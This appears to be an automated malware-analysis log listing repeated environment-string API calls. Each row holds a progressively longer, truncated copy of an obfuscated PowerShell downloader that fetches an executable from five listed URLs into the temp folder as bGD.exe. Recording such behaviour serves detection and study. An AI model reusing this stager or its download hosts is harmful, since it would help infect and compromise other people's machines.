| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open() |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open(); |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$E |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EH |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.t |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.ty |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.typ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1 |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1; |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$E |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EH |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.w |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.wr |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.wri |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.writ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($r |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($ra |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.r |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.re |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.res |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.resp |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.respo |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.respon |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.respons |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.response |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseB |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBo |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBod |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody) |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody); |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$Tia,0);$rat.send();If ($rat.Status -eq 200) {$EHT.open();$EHT.type = 1;$EHT.write($rat.responseBody);$ |
|
1 | |
